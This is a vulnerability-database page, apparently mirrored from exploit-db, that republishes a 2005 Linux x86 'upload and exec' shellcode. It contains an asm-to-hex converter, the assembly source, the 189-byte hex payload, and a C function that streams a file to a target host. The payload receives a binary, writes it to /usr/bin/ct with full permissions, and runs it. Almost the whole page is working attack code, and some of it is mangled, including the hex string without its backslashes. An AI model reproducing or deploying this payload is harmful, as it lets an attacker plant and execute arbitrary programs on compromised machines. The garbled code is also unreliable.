Linux/x86 – upload + exec Shellcode (189 bytes)

Linux/x86 – upload + exec Shellcode (189 bytes)

漏洞ID 1055171 漏洞类型
发布时间 2005-06-19 更新时间 2005-06-19
图片[1]-Linux/x86 – upload + exec Shellcode (189 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – upload + exec Shellcode (189 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13416
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
UPLOAD & EXEC SHELLCODE

[1] converting asm to hex
[2] asm code
[3] hex output
[4] upload function

This is an 'upload and exec' shellcode for the x86 platform.
File has to be in executable format,
cool if you know the distribution of the target, otherwise
it is useless.

-cybertronic

[1]

/*
 * convert .s to shellcode typo/teso ([email protected])
 *
 * $ cat asm.s
 * .globl cbegin
 * .globl cend
 * cbegin:
 * "asm goes here"
 * cend:
 * $ gcc -Wall asm.s asm2hex.c -o out
 * $ ./out
 *
 */

#include

extern void cbegin();
extern void cend();

int
main ()
{
    int i = 0;
    int x = 0;
    char* buf = ( char* ) cbegin;

    printf ( "unsigned char shellcode[] =n"" );
    for ( ; ( *buf ) && ( buf < ( char* ) cend ); buf++ )
	{
		if ( i++ == 16 )
			i = 1;
		if ( i == 1 && x != 0 )
			printf ( ""n"" );
		x = 1;
		printf ( "\x%02x", ( unsigned char )* buf );
	}
	printf ( "";n" );
    return ( 0 );
}

[2]

# append to any bind shellcode
# gcc -Wall upload-exec.s asm2hex.c -o upload-exec
# cybertronic

.globl cbegin
.globl cend

cbegin:

	movl %eax,%ecx

	jmp getstr

start:

	popl %esi

	leal (%esi),%ebx
	xorl %eax,%eax
	movb %al,0x0b(%esi)

	pushl %esi
	pushl %ecx

	movb $0x05,%al
	movw $0x241,%cx
	movw $00777,%dx
	int  $0x80
	movl %eax,%edi
	popl %esi

read:

	movl %esi,%ebx
	movb $0x03,%al
	leal -200(%esp),%ecx
	movb $0x01,%dl
	int  $0x80

	cmpl $0xffffffff,%eax
	je end
	xorl %ecx,%ecx
	cmpl %eax,%ecx
	je continue

	leal -200(%esp),%ecx
	xorl %ebx,%ebx
	movl %edi,%ebx
	movl %eax,%edx
	movb $0x04,%al
	int  $0x80

	jmp read

continue:

	movb $0x06,%al
	movl %esi,%ebx
	int  $0x80
	movb $0x06,%al
	xorl %ebx,%ebx
	movl %edi,%ebx
	int  $0x80

	xorl %esi, %esi
	popl %esi
	movl %esi,0x0c(%esi)
	xorl %eax,%eax
	movl %eax,0x10(%esi)
	movb $0x0b,%al
	xchgl %esi,%ebx
	leal 0x0c(%ebx),%ecx
	leal 0x10(%ebx),%edx
	int $0x80

end:

	xorl %eax,%eax
	incl %eax
	int $0x80

getstr:

	call start
	.string "/usr/bin/ct"

cend:

[3]

/*
 * linux x86
 * 189 bytes upload & exec shellcode by cybertronic
 * cybertronic[at]gmx[dot]net
 *
 */

unsigned char shellcode[] =
"x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80"
"x89xc7x52x66x68xc7xc7x43x66x53x89xe1xb0xefxf6xd0"
"x50x51x57x89xe1xb0x66xcdx80xb0x66x43x43xcdx80x50"
"x50x57x89xe1x43xb0x66xcdx80x89xc1xebx70x5ex8dx1e"
"x31xc0x88x46x0bx56x51xb0x05x66xb9x41x02x66xbaxff"
"x01xcdx80x89xc7x5ex89xf3xb0x03x8dx8cx24x38xffxff"
"xffxb2x01xcdx80x83xf8xffx74x3ex31xc9x39xc1x74x13"
"x8dx8cx24x38xffxffxffx31xdbx89xfbx89xc2xb0x04xcd"
"x80xebxd3xb0x06x89xf3xcdx80xb0x06x31xdbx89xfbxcd"
"x80x31xf6x5ex89x76x0cx31xc0x89x46x10xb0x0bx87xf3"
"x8dx4bx0cx8dx53x10xcdx80x31xc0x40xcdx80xe8x8bxff"
"xffxffx2fx75x73x72x2fx62x69x6ex2fx63x74";

[4]

int
upload ( char* ip )
{
	int s;
	int fd;
	char ch;
	struct stat st;

	s = conn ( ip );

	if ( ( fd = open ( "file", O_RDONLY ) ) == -1 )
		return ( 1 );
	fstat ( fd, &st );
	while ( st.st_size-- > 0 )
	{
		if ( read ( fd, &ch, 1 ) < 0 )
			return ( 1 );
		if ( write ( s, &ch, 1 ) < 0 )
			return ( 1 );
	}
	close ( fd );
	close ( s );
	return ( 0 );
}

# milw0rm.com [2005-06-19]

相关推荐: Netscape Communicator Javascript TITLE Vulnerability

Netscape Communicator Javascript TITLE Vulnerability 漏洞ID 1104732 漏洞类型 Input Validation Error 发布时间 1999-05-24 更新时间 1999-05-24 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享